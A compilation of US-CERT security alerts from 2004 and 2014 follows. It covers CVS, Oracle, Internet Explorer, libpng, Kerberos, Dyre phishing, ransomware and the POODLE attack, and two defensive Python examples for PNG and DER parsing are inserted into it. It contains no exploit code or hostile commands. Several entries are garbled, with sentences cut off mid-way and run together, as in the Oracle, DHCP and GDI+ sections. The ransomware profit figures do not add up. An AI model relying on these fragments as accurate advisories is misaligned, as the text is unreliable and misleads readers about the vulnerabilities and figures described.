US-CERT is tracking this issue as VU#192038. This reference number corresponds to CVE candidate CAN-2004-0396.
An authenticated client could exploit this vulnerability to execute arbitrary code on the vulnerable system with the privileges of the CVS server process. It is possible for an anonymous user with read-only access to exploit a vulnerable server, as such users are authenticated through the cvspserver process. In addition to compromising the system running CVS, there is a significant secondary impact in that source code maintained in CVS repositories could be modified to include Trojan horses, backdoors, or other malicious code.
Apply Patch or Upgrade
Apply the appropriate patch or upgrade as specified by your vendor. For vendor-specific responses, please see your vendor's website or Vulnerability Note VU#192038. This issue has been resolved in Stable CVS Version 1.11.16 and CVS Feature Version 1.12.8.
Disable CVS Server
Until a patch or upgrade can be applied, consider disabling the CVS server.
Block or Restrict Access
Block or restrict access to the CVS server from untrusted hosts and networks. The CVS server typically listens on 2401/tcp, but may use another port or protocol. Note that some of these workarounds will only limit the scope and impact of possible attacks. Note also that anonymous (read-only) access is sufficient to exploit this vulnerability.
US-CERT thanks Stefan Esser of e-matters for reporting this problem and for information used to construct this advisory. Feedback can be directed to the authors: Jason A. Rafail and Damon Morda
May 26, 2004: Initial release
SQL Injection Vulnerabilities in Oracle E-Business Suite
Note that no authentication mechanisms of Oracle E-Business Suite will US-CERT is tracking this issue as VU#961579.
An unauthenticated attacker could exploit this vulnerability to execute Apply Patch or Upgrade According to the Oracle Security http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=274375.1
Note that the above link requires registration to Oracle Metalink. To US-CERT thanks Stephen Kost of Integrigy Corporation for reporting this Feedback can be directed to the author: Jason
June 8, 2004: Initial release
Cross-Domain Redirect Vulnerability in Internet Explorer
This issue has been assigned CVE CAN-2004-0549.
By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. Publicly available exploit code exists for this vulnerability, and US-CERT has monitored incident reports that indicate that this vulnerability is being actively exploited. Microsoft has released a cumulative patch (867801) in Security Bulletin MS04-025 which addresses this issue. Disabling Active scripting and ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent widely used payload delivery techniques from functioning. Instructions for disabling Active scripting in the Internet Zone can be found in the Malicious Web Scripts FAQ. See Microsoft Knowledge Base Article 833633 for information about securing the Local Machine Zone. Also, Service Pack 2 for Windows XP (currently at RC1) includes these and other security enhancements for IE.
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels. While this is generally good security practice, following this behavior will not prevent exploitation of this vulnerability in all cases.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.
Public incidents related to this vulnerability were reported by Rafel Ivgi.
Thanks to Jelmer for further research and analysis. Feedback can be directed to the author: Art Manion. June 11, 2004: Initial release
Cross-Domain Vulnerability in Internet Explorer
Microsoft has released a patch to resolve this issue. It is available from Microsoft Windows Update or Microsoft Security Bulletin MS04-025.
Instructions for disabling Active scripting and ActiveX controls in the Internet Zone can be found in the Malicious Web Scripts FAQ.
Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels. It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible. Author: Michael Durkota
Multiple Vulnerabilities in ISC DHCP 3
VU#654390 discusses C For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP All versions of ISC DHCP 3, including all snapshots, betas, and release US-CERT is tracking these issues as VU#317350, which has been Exploitation of these vulnerabilities may cause a denial-of-service Apply patches or upgrade These issues have been resolved in ISC DHCP 3.0.1rc14. US-CERT thanks Gregory Duchemin and Solar Designer for Feedback can be directed to the author: Jason
June 22, 2004: Initial release
Important Internet Explorer Update Available
Microsoft has released a security update for IE that provides increased protection against this type of attack. Note that this update may not prevent attacks in all cases.
US-CERT recommends that users install the update from the Microsoft Download Center (KB870669) or the Windows Update web site. In addition, US-CERT strongly recommends that users modify IE security settings according to the instructions in the Malicious Web Scripts FAQ. Further information is available from Microsoft in What You Should Know About Download.Ject. Author: Art Manion
Internet Explorer Update to Disable ADODB.Stream ActiveX Control
An ADO stream object contains methods for reading and writing binary files and text files. When an ADO stream object is combined with known security vulnerabilities in Internet Explorer, a Web site could execute scripts from the Local Machine zone. To help protect your computer from this kind of attack, you can manually modify your registry.
It is important to note that there may be other ways for an attacker to write arbitrary data or to execute commands without relying on the ADODB.Stream control. Further information is available from Microsoft in What You Should Know About Download.Ject. Instructions for securing IE and other web browsers against malicious web scripts are available in the Malicious Web Scripts FAQ. By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. Recent incident activity known as Download.Ject (also JS.Scob.Trojan, Scob, JS.Toofeer) uses cross-domain vulnerabilities and the ADODB.Stream control to install software that steals sensitive financial information. Until a complete solution is available from Microsoft, consider the following workarounds. Disabling Active scripting and ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent widely used payload delivery techniques from functioning. Instructions for disabling Active scripting in the Internet Zone can be found in the Malicious Web Scripts FAQ. See Microsoft Knowledge Base Article 833633 for information about securing the Local Machine Zone. Also, Service Pack 2 for Windows XP (currently at RC2) includes these and other security enhancements for IE. Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. While this is generally good security practice, following this behavior will not prevent exploitation of this vulnerability in all cases. 
For example, a trusted web site could be compromised and modified to deliver exploit script to unsuspecting clients. One way to disable the ADODB.Stream control is to apply the update from the Microsoft Download Center (KB870669) or the Windows Update web site. The ADODB.Stream control can also be disabled by modifying the Windows registry as described in Microsoft Knowledge Base Article 870669. Both of these methods disable ADODB.Stream by setting the kill bit for the control in the Windows registry. Note that disabling the ADODB.Stream control does not directly address any cross-domain vulnerabilities, nor does it prevent attacks. This workaround prevents a well-known and widely used technique for writing arbitrary data to disk after a cross-domain vulnerability has been exploited. There may be other ways for an attacker to write arbitrary data or execute commands. Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Please see What You Should Know About Download.Ject and Microsoft Knowledge Base Article 870669. Feedback can be directed to the author: Art Manion July 2, 2004: Initial release
Multiple Vulnerabilities in Microsoft Windows Components and Outlook Express
An attacker may be able to control your computer if these vulnerabilities are exploited.
Microsoft has provided the patches for these vulnerabilities in the Security Bulletins and on Windows Update. Do not click on unsolicited links received in email, instant messages, web forums, or chat rooms. While this is generally a good security practice, following this behavior will not prevent the exploitation of these vulnerabilities in all cases. Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Update your anti-virus software. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Specific information about the Security Bulletins is available in the Security Bulletin Summary for July, 2004 and the US-CERT Vulnerability Notes for these issues. This alert was created by Jason A. Rafail. Feedback can be directed to the Vulnerability Note authors: Jason A. Rafail, Jeffrey P. Lanza, Chad R. Dougherty, Damon G. Morda, and Art Manion.
Multiple Vulnerabilities in Microsoft Windows Components and Outlook Express
A remote, unauthenticated attacker may exploit VU#717748 to execute arbitrary code on an IIS 4.0 system.
Exploitation of VU#106324, VU#187196, VU#920060, and VU#228028 would permit a remote attacker to execute arbitrary code with the privileges of the current user. The attacker would have to convince a victim to view an HTML document (web page, HTML email) or click on a crafted URI link. Vulnerabilities described in VU#647436 and VU#868580 permit a local user to gain elevated privileges on the local system. Exploitation of VU#869640 can lead to a denial-of-service condition against Outlook Express. Microsoft has provided the patches for these vulnerabilities in the Security Bulletins and on Windows Update. It is generally a good practice not to click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels. However, this practice does not always prevent exploitation of these types of vulnerabilities. For example, a trusted web site could be compromised and modified to deliver exploit script to unsuspecting clients. Anti-virus software with updated virus definitions may identify and prevent some exploit attempts, but variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against these vulnerabilities. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page. Specific information about these issues is available in the Security Bulletin Summary for July, 2004 and the US-CERT Vulnerability Notes. This alert was created by Jason A. Rafail. Feedback can be directed to the Vulnerability Note authors: Jason A. Rafail, Jeffrey P. Lanza, Chad R. Dougherty, Damon G. Morda, and Art Manion. July 14, 2004: Initial release
New Variant of MyDoom Virus
It is important that you use antivirus software and keep it up to date. Most antivirus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many antivirus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible.
This variant of MyDoom (known as MyDoom.M or MyDoom.O) is significant because it seems to be conducting searches on addresses it harvests from infected computers. Therefore, not only is email activity affected, response times in many popular search engines may be dramatically slower.
Author: Mindi McDowell. Feedback can be directed to US-CERT.
Multiple Vulnerabilities in Systems Running Microsoft Windows
Microsoft has issued updates that resolve this problem. Obtain the appropriate update from Windows Update.
Never open unexpected email attachments. Before opening an attachment, save it to a disk and scan it with anti-virus software. Make sure to turn off the option to automatically download attachments.
Email programs like Outlook and Outlook Express interpret HTML code the same way that Internet Explorer does. Attackers may be able to take advantage of that by sending malicious HTML-formatted email messages. It is important that you use anti-virus software and keep it up to date. Most anti-virus software vendors frequently release updated information, tools, or virus databases to help detect and recover from virus infections. Many anti-virus packages support automatic updates of virus definitions. US-CERT recommends using these automatic updates when possible. In Microsoft Security Bulletin MS04-025, Microsoft describes a critical vulnerability in the way Internet Explorer processes .GIF and .BMP images. An attacker can use malicious images on a web page or in HTML-formatted email messages. If the attacker can convince a user to visit the web page, open the message, or otherwise view the image, the attacker may be able to gain control of the user's machine. There is also a vulnerability in the way Internet Explorer processes scripts. An attacker may be able to take advantage of frames to redirect users to a malicious web site. More technical information about this issue is available in TA04-212A and Microsoft Security Bulletin MS04-025. Author: Mindi McDowell. Feedback can be directed to the US-CERT Technical Staff.
Critical Vulnerabilities in Microsoft Windows
Microsoft Internet Explorer contains three vulnerabilities that may Microsoft Security Bulletin MS04-025
VU#266926 - An integer overflow vulnerability has been discovered in the way that (Other resources: CAN-2004-0566)
VU#685364 - A double-free vulnerability has been discovered in the way that (Other resources: CAN-2003-1048)
VU#713878 - As previously discussed in TA-163A, (Other resources: CAN-2004-0549)
Remote attackers exploiting the vulnerabilities described above may
Apply the appropriate patch as specified by Microsoft Security
Microsoft provides several workarounds for each of these vulnerabilities. This appendix contains information provided by vendors for this
Please see Microsoft Security Bulletin MS04-025.
Feedback can be directed to the US-CERT
Jul 30, 2004: Initial release
Multiple Vulnerabilities in libpng
Several vulnerabilities have been reported in the libpng library. Any application or system that uses this library may be affected. More detailed information is available in the individual vulnerability notes:
VU#388984 - libpng fails to properly check length of transparency chunk (tRNS) data
A buffer overflow vulnerability has been discovered in the way that libpng processes PNG images. This vulnerability could allow a remote attacker to execute arbitrary code on a vulnerable system by introducing a specially crafted PNG image.
VU#236656 - libpng png_handle_iCCP() NULL pointer dereference
Under some circumstances, a null pointer may be dereferenced during a memory allocation in the png_handle_iCCP() function. As a result, a PNG image with particular characteristics could cause the affected application to crash. Similar errors are reported to exist in other locations within libpng.
VU#160448 - libpng integer overflow in image height processing
An integer overflow error exists in the handling of PNG image height within the png_read_png() function. As a result, a PNG image with excessive height may cause an integer overflow during a memory allocation operation, which could cause the affected application to crash.
VU#477512 - libpng png_handle_sPLT() integer overflow
A potential integer overflow error exists during a memory allocation operation within the png_handle_sPLT() function. It is unclear what practical impact this error might have on applications using libpng.
VU#817368 - libpng png_handle_sBIT() performs insufficient bounds checking
A potentially insufficient bounds check exists within the png_handle_sBIT() function. A similar error exists in the png_handle_hIST() function. While the code that contains these errors could potentially permit a buffer overflow to occur during a subsequent png_crc_read() operation, it is unclear what practical vulnerabilities it might present in applications using libpng.
VU#286464 - libpng contains integer overflows in progressive display image reading
The libpng library provides the ability to display interlaced, or progressive display, PNG images. A number of potential integer overflow errors exist in libpng's handling of such progressive display images.
While the code that contains these errors introduces dangerous conditions, it is unclear what practical vulnerabilities it might present in applications using libpng. In the case of VU#388984, an attacker with the ability to introduce a malformed PNG image to a vulnerable application could cause the application to crash or could potentially execute arbitrary code with the privileges of the user running the affected application. In the case of VU#236656 and VU#160448, an attacker with the ability to introduce a malformed PNG image to a vulnerable application could cause the application to crash. The impacts of the other vulnerabilities described above are unclear. A remote attacker could cause an application to crash or potentially execute arbitrary code by convincing a victim user to visit a malicious web site or view an email message containing a malformed image. Apply the appropriate patch or upgrade as specified by your vendor. For For individuals who rely on the original source of libpng, these issues US-CERT thanks Chris Evans for researching and reporting these vulnerabilities. Feedback can be directed to the US-CERT Technical Staff. Aug 4, 2004: Initial release
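The checks a chunk reader needs against the bug classes listed above (chunk length and CRC framing, tRNS length validated against the colour type as in VU#388984, and image dimensions checked before a row-buffer size is computed as in VU#160448), as an added example in Python. This is not libpng's code; the PNG limits used are those of the PNG specification, the 32-bit size_t ceiling is an assumed target, and the sample files are constructed in memory:

```python
# Added example: a bounds-checked PNG chunk walker (not libpng code).
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MAX_CHUNK_LENGTH = 2 ** 31 - 1   # PNG spec: chunk length must not exceed 2^31-1
MAX_DIMENSION = 2 ** 31 - 1      # same limit applies to width and height
SIZE_T_32 = 2 ** 32 - 1          # largest allocation a 32-bit size_t can express
SAMPLES_PER_PIXEL = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # keyed by colour type


class PngError(ValueError):
    """Raised for any malformed structure; the caller must not allocate."""


def iter_chunks(data):
    """Yield (type, payload) per chunk after verifying framing and CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise PngError("missing PNG signature")
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        if len(data) - pos < 12:
            raise PngError("truncated chunk header")
        length, ctype = struct.unpack("!I4s", data[pos:pos + 8])
        if length > MAX_CHUNK_LENGTH:
            raise PngError("chunk length exceeds PNG limit")
        end = pos + 8 + length + 4
        if end > len(data):
            raise PngError("chunk length runs past end of file")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack("!I", data[end - 4:end])
        if zlib.crc32(ctype + payload) != crc:
            raise PngError("CRC mismatch in %r chunk" % ctype)
        yield ctype, payload
        pos = end


def row_bytes(width, bit_depth, color_type):
    """Bytes per scanline including the leading filter-type byte."""
    bits = width * bit_depth * SAMPLES_PER_PIXEL[color_type]
    return (bits + 7) // 8 + 1


def trns_length_bounds(color_type, palette_entries):
    """Permitted tRNS payload length range for a colour type."""
    if color_type == 0:
        return 2, 2                          # one 16-bit grey sample
    if color_type == 2:
        return 6, 6                          # three 16-bit samples
    if color_type == 3:
        return 1, min(palette_entries, 256)  # one alpha byte per palette entry
    raise PngError("tRNS not allowed for colour types with an alpha channel")


def validate_png(data, max_alloc=SIZE_T_32):
    """Return (width, height, bit_depth, color_type) when every check
    passes; raise PngError otherwise. Pixel data is not decoded."""
    header = None
    palette_entries = 0
    for ctype, payload in iter_chunks(data):
        if ctype == b"IHDR":
            if len(payload) != 13:
                raise PngError("IHDR must be 13 bytes")
            width, height, depth, color_type, _, _, _ = struct.unpack("!IIBBBBB", payload)
            if not (0 < width <= MAX_DIMENSION and 0 < height <= MAX_DIMENSION):
                raise PngError("image dimensions out of range")
            if color_type not in SAMPLES_PER_PIXEL or depth not in (1, 2, 4, 8, 16):
                raise PngError("unsupported bit depth or colour type")
            # Python integers do not wrap, so this product is exact; a C
            # decoder must make the comparison before multiplying.
            if row_bytes(width, depth, color_type) * height > max_alloc:
                raise PngError("row buffers would exceed addressable memory")
            header = (width, height, depth, color_type)
        elif header is None:
            raise PngError("IHDR must be the first chunk")
        elif ctype == b"PLTE":
            if len(payload) % 3 or not 3 <= len(payload) <= 768:
                raise PngError("PLTE must hold 1..256 three-byte entries")
            palette_entries = len(payload) // 3
        elif ctype == b"tRNS":
            low, high = trns_length_bounds(header[3], palette_entries)
            if not low <= len(payload) <= high:
                raise PngError("tRNS length %d invalid for colour type %d"
                               % (len(payload), header[3]))
    if header is None:
        raise PngError("no IHDR chunk")
    return header


def _chunk(ctype, payload):
    return (struct.pack("!I", len(payload)) + ctype + payload
            + struct.pack("!I", zlib.crc32(ctype + payload)))


def make_png(width, height, depth, color_type, extra_chunks=()):
    """Constructed minimal PNG for testing; IDAT carries token data only."""
    ihdr = struct.pack("!IIBBBBB", width, height, depth, color_type, 0, 0, 0)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + b"".join(_chunk(t, p) for t, p in extra_chunks)
            + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b""))


def is_rejected(data):
    """True when validate_png refuses the file."""
    try:
        validate_png(data)
    except PngError:
        return True
    return False
```

Every rejection happens before any size derived from the file is used for allocation, which is the property the affected functions lacked.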
Security Improvements in Windows XP Service Pack 2
Note: Service Pack 2 makes significant changes to improve the security of Windows XP, and these changes may have negative effects on some programs and Windows functionality. Before you install Service Pack 2, back up your important data and consult your computer manufacturer's web site for information about Service Pack 2.
Windows XP Service Pack 2 is a major operating system update that contains a number of new security updates and features. Like other Microsoft Service Packs, Windows XP Service Pack 2 also includes previously released security fixes and other operating system updates. Following is a summary of the new security updates and features in Service Pack 2:
Windows Firewall
Authors: Art Manion and Mindi McDowell. Feedback can be directed to the US-CERT Technical Staff.
August 30, 2004: Initial release
Multiple Vulnerabilities in Oracle Products
Several vulnerabilities exist in the Oracle Database Server, Application Several vulnerabilities have been reported in Oracle's Database Server, Oracle has released Oracle We are tracking them as follows:
VU#170830 - VU#316206 - VU#435974 - As more information becomes available, we will update these The impacts of the vulnerabilities described above are unclear. According to credible reports, the impacts of these vulnerabilities Apply the appropriate patch or upgrade as specified in the Oracle Organizations that use Oracle's Collaboration Suite or E-Business Suite US-CERT thanks all the parties involved in researching and reporting these Feedback can be directed to the author: Sep 1, 2004: Initial release Sep 3, 2004: Updated Credits
Vulnerabilities in MIT Kerberos 5
VU#795632 - MIT Kerberos 5 ASN.1 decoding functions insecurely deallocate memory (double-free)
The MIT Kerberos 5 library does not securely deallocate heap memory when decoding ASN.1 structures, resulting in double-free vulnerabilities. An unauthenticated, remote attacker could execute arbitrary code on a KDC server, which could compromise an entire Kerberos realm. An attacker may also be able to execute arbitrary code on Kerberos clients, or cause a denial of service on KDCs or clients.
VU#866472 - MIT Kerberos 5 ASN.1 decoding function krb5_rd_cred() insecurely deallocates memory (double-free)
The krb5_rd_cred() function in the MIT Kerberos 5 library does not securely deallocate heap memory when decoding ASN.1 structures, resulting in a double-free vulnerability. A remote, authenticated attacker could execute arbitrary code or cause a denial of service on any system running an application that calls krb5_rd_cred(). This includes Kerberos application servers and other applications that process Kerberos authentication via the MIT Kerberos 5 library, Generic Security Services Application Programming Interface (GSSAPI), and other libraries.
VU#350792 - MIT Kerberos krb524d insecurely deallocates memory (double-free)
The MIT Kerberos krb524d daemon does not securely deallocate heap memory when handling an error condition, resulting in a double-free vulnerability. An unauthenticated, remote attacker could execute arbitrary code on a system running krb524d, which in many cases is also a KDC. The compromise of a KDC system can lead to the compromise of an entire Kerberos realm. An attacker may also be able to cause a denial of service on a system running krb524d.
VU#550464 - MIT Kerberos 5 ASN.1 decoding function asn1buf_skiptail() does not properly terminate loop
The asn1buf_skiptail() function in the MIT Kerberos 5 library does not properly terminate a loop, allowing an unauthenticated, remote attacker to cause a denial of service in a KDC, application server, or Kerberos client.
The impacts of these vulnerabilities vary, but an attacker may be able to execute arbitrary code on KDCs, systems running krb524d (typically also KDCs), application servers, applications that use Kerberos libraries directly or via GSSAPI, and Kerberos clients. An attacker could also cause a denial of service on any of these systems.
The most severe vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on a KDC system. This could result in the compromise of both the KDC and an entire Kerberos realm.
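The decoder-robustness half of what the fixes above restore, as an added example: a DER reader in which every element's length is validated against the remaining buffer before anything is consumed, and the loop that skips trailing elements (the role of asn1buf_skiptail()) is guaranteed to advance or raise, so truncated input cannot make it spin. This is not MIT Kerberos code; the double-free half of the problem is a C memory-management defect that Python does not exhibit, so only the parsing side is shown. The sample encodings are constructed:

```python
# Added example: bounds-checked DER decoding with a guaranteed-to-terminate
# skip loop (not MIT Kerberos code).


class DerError(ValueError):
    """Raised on malformed input; nothing is partially consumed on error."""


def read_tlv(buf, pos, end):
    """Decode one tag-length-value triple at pos without reading past end.
    Returns (tag, value_start, value_end, next_pos)."""
    if pos >= end:
        raise DerError("element expected at offset %d" % pos)
    tag = buf[pos]
    pos += 1
    if tag & 0x1f == 0x1f:
        raise DerError("multi-byte tags are not supported here")
    if pos >= end:
        raise DerError("length byte missing")
    first = buf[pos]
    pos += 1
    if first < 0x80:                      # short form
        length = first
    elif first == 0x80:
        raise DerError("indefinite length is not valid in DER")
    else:                                 # long form: next n bytes hold the length
        n = first & 0x7f
        if n > 4 or pos + n > end:
            raise DerError("length field too long or truncated")
        length = int.from_bytes(buf[pos:pos + n], "big")
        if length < 0x80:
            raise DerError("non-minimal length encoding")
        pos += n
    if length > end - pos:
        raise DerError("length %d exceeds remaining %d bytes" % (length, end - pos))
    return tag, pos, pos + length, pos + length


def skip_tail(buf, pos, end):
    """Skip every element remaining in [pos, end) and return the count.
    read_tlv always advances, but the explicit progress check turns any
    future decoder bug into an error rather than an endless loop."""
    skipped = 0
    while pos < end:
        _, _, _, next_pos = read_tlv(buf, pos, end)
        if next_pos <= pos:
            raise DerError("decoder made no progress at offset %d" % pos)
        pos = next_pos
        skipped += 1
    return skipped


def parse_sequence(buf, keep=None):
    """Parse a top-level DER SEQUENCE. The first `keep` elements (all, when
    keep is None) are returned as (tag, value) pairs; the rest are skipped.
    Returns (elements, number_skipped)."""
    tag, pos, end, next_pos = read_tlv(buf, 0, len(buf))
    if tag != 0x30:
        raise DerError("expected SEQUENCE tag 0x30, got 0x%02x" % tag)
    if next_pos != len(buf):
        raise DerError("trailing bytes after SEQUENCE")
    elements = []
    while pos < end and (keep is None or len(elements) < keep):
        etag, vstart, vend, pos = read_tlv(buf, pos, end)
        elements.append((etag, bytes(buf[vstart:vend])))
    return elements, skip_tail(buf, pos, end)


def is_rejected(buf):
    """True when the input is refused rather than decoded."""
    try:
        parse_sequence(buf)
    except DerError:
        return True
    return False


if __name__ == "__main__":
    # SEQUENCE { INTEGER 5, OCTET STRING "ab" } (constructed)
    print(parse_sequence(bytes.fromhex("300702010504026162")))
    # Outer length claims 7 bytes but only 6 follow: refused, no spin.
    print(is_rejected(bytes.fromhex("3007020105040561")))
```

The zero-length NULL element (05 00) is the case worth keeping in a regression suite: a skip loop that advances by the value length alone stalls on it, while one that advances past the tag and length bytes as well always terminates.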
Check with your vendor(s) for patches or updates. For information about a specific vendor, please see the systems affected sections in the individual vulnerability notes or contact your vendor directly.
Alternatively, apply the appropriate source code patch(es) referenced in MITKRB5-SA-2004-002 and MITKRB5-SA-2004-003 and recompile.
These vulnerabilities will be addressed in krb5-1.3.5.
Thanks to Tom Yu and the MIT Kerberos Development team for addressing these vulnerabilities and coordinating with vendors. MIT credits the following people: Will Fiveash, Joseph Galbraith, John Hawkinson, Marc Horowitz, and Nico Williams.
September 3, 2004: Initial release
Vulnerability in Microsoft Image Processing Component
Note: You may need to install multiple patches depending what
Never open unexpected email attachments. Before opening an attachment,
Email programs like Outlook and Outlook Express interpret HTML code
It is important that you use anti-virus software and keep it up to
Microsoft Windows Graphics Device Interface (GDI+) is used to display information on screens Author: Mindi McDowell. Feedback Copyright 2004 Carnegie Mellon University.
September 14, 2004: Initial release
Microsoft Windows JPEG component buffer overflow
Microsoft's Graphic Device Interface Plus (GDI+) contains a Microsoft Security Bulletin MS04-028 Any applications (Microsoft or third-party) that use the GDI+ library In addition to running Microsoft's detection utility, we recommend We are tracking this vulnerability in Vulnerability Remote attackers exploiting the vulnerability described above may Apply the appropriate patches as specified in Microsoft Security In addition to releasing some patches on Windows Update, Microsoft Third-party software that relies on GDI+ to render JPEG images may Microsoft provides several workarounds for this vulnerability. The following Microsoft Products are affected: Feedback can be directed to the US-CERT
Sept 16, 2004: Initial release
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
TA14-300A: Phishing Campaign Linked with “Dyre” Banking Malware
Microsoft Windows
Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payload(s).[1][2] Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware. The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors.[3] Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in unpatched versions of Adobe Reader.[4][5] After successful exploitation, a user's system will download Dyre banking malware. All of the major anti-virus vendors have successfully detected this malware prior to the release of this alert.[6] Please note, the below listing of indicators does not represent all characteristics and indicators for this campaign. Phishing Email Characteristics: System Level Indicators (upon successful exploitation): A system infected with Dyre banking malware will attempt to harvest credentials for online services, including banking services. Users and administrators are recommended to take the following preventive measures to protect their computer networks from phishing campaigns: US-CERT collects phishing email messages and website locations so that we can help people avoid becoming victims of phishing scams. You can report phishing to us by sending email to phishing-report@us-cert.gov. This product is provided subject to this Notification and this Privacy & Use policy.
TA14-295A: Crypto Ransomware
Microsoft Windows
Ransomware is a type of malicious software (malware) that infects a computer and restricts access to it until a ransom is paid to unlock it. This Alert is the result of Canadian Cyber Incident Response Centre (CCIRC) analysis in coordination with the United States Department of Homeland Security (DHS) to provide further information about crypto ransomware, specifically to: Ransomware is a type of malware that infects a computer and restricts a user’s access to the infected computer. This type of malware, which has now been observed for several years, attempts to extort money from victims by displaying an on-screen alert. These alerts often state that their computer has been locked or that all of their files have been encrypted, and demand that a ransom is paid to restore access. This ransom is typically in the range of $100–$300 dollars, and is sometimes demanded in virtual currency, such as Bitcoin. Ransomware is typically spread through phishing emails that contain malicious attachments and drive-by downloading. Drive-by downloading occurs when a user unknowingly visits an infected website and malware is downloaded and installed without their knowledge. Crypto ransomware, a variant that encrypts files, is typically spread through similar methods, and has been spread through Web-based instant messaging applications. The authors of ransomware instill fear and panic into their victims, causing them to click on a link or pay a ransom, and inevitably become infected with additional malware, including messages similar to those below: In 2012, Symantec, using data from a command and control (C2) server of 5,700 computers compromised in one day, estimated that approximately 2.9 percent of those compromised users paid the ransom. With an average ransom of $200, this meant malicious actors profited $33,600 per day, or $394,400 per month, from a single C2 server. These rough estimates demonstrate how profitable ransomware can be for malicious actors.
This financial success has likely led to a proliferation of ransomware variants. In 2013, more destructive and lucrative ransomware variants were introduced including Xorist, CryptorBit, and CryptoLocker. Some variants encrypt not just the files on the infected device but also the contents of shared or networked drives. These variants are considered destructive because they encrypt user’s and organization’s files, and render them useless until criminals receive a ransom. Additional variants observed in 2014 included CryptoDefense and Cryptowall, which are also considered destructive. Reports indicate that CryptoDefense and Cryptowall share the same code, and that only the name of malware itself is different. Similar to CryptoLocker, these variants also encrypt files on the local computer, shared network files, and removable media. Systems infected with ransomware are also often infected with other malware. In the case of CryptoLocker, a user typically becomes infected by opening a malicious attachment from an email. This malicious attachment contains Upatre, a downloader, which infects the user with GameOver Zeus. GameOver Zeus is a variant of the Zeus Trojan that steals banking information and is also used to steal other types of data. Once a system is infected with GameOver Zeus, Upatre will also download CryptoLocker. Finally, CryptoLocker encrypts files on the infected system, and requests that a ransom be paid. The close ties between ransomware and other types of malware were demonstrated through the recent botnet disruption operation against GameOver Zeus, which also proved effective against CryptoLocker. In June 2014, an international law enforcement operation successfully weakened the infrastructure of both GameOver Zeus and CryptoLocker. 
Ransomware doesn't only target home users; businesses can also become infected with ransomware, which can have negative consequences, including:

Paying the ransom does not guarantee the encrypted files will be released; it only guarantees that the malicious actors receive the victim's money and, in some cases, their banking information. In addition, decrypting files does not mean the malware infection itself has been removed. Infections can be devastating to an individual or organization, and recovery can be a difficult process that may require the services of a reputable data recovery specialist.

US-CERT and CCIRC recommend users and administrators take the following preventive measures to protect their computer networks from ransomware infection:

Individuals or organizations are not encouraged to pay the ransom, as this does not guarantee files will be released. Report instances of fraud to the FBI at the Internet Crime Complaint Center or contact the CCIRC.

This product is provided subject to this Notification and this Privacy & Use policy.
TA14-290A: SSL 3.0 Protocol Vulnerability and POODLE Attack
All systems and applications utilizing the Secure Sockets Layer (SSL) 3.0 protocol with cipher-block chaining (CBC) mode ciphers may be vulnerable. The POODLE (Padding Oracle On Downgraded Legacy Encryption) attack demonstrates this vulnerability using web browsers and web servers, which is one of the most likely exploitation scenarios.

US-CERT is aware of a design vulnerability in the way SSL 3.0 handles block cipher mode padding. The POODLE attack demonstrates how an attacker can exploit this vulnerability to decrypt and extract information from inside an encrypted transaction.

The SSL 3.0 vulnerability stems from the way CBC-mode records are padded: the padding bytes are not covered by the record's MAC, and SSL 3.0 requires the receiver to check only the final padding-length byte, not the content of the padding. A receiver that decrypts a modified record therefore reveals, through its accept-or-reject behaviour, whether the last byte of a chosen ciphertext block decrypted to a valid padding length. The POODLE attack takes advantage of the protocol version negotiation feature built into SSL/TLS to force the use of SSL 3.0 and then leverages this padding oracle to decrypt selected content within the SSL session. The decryption is done byte by byte, and each byte costs on average 256 attempts, so the attack generates a large number of connections between the client and server.

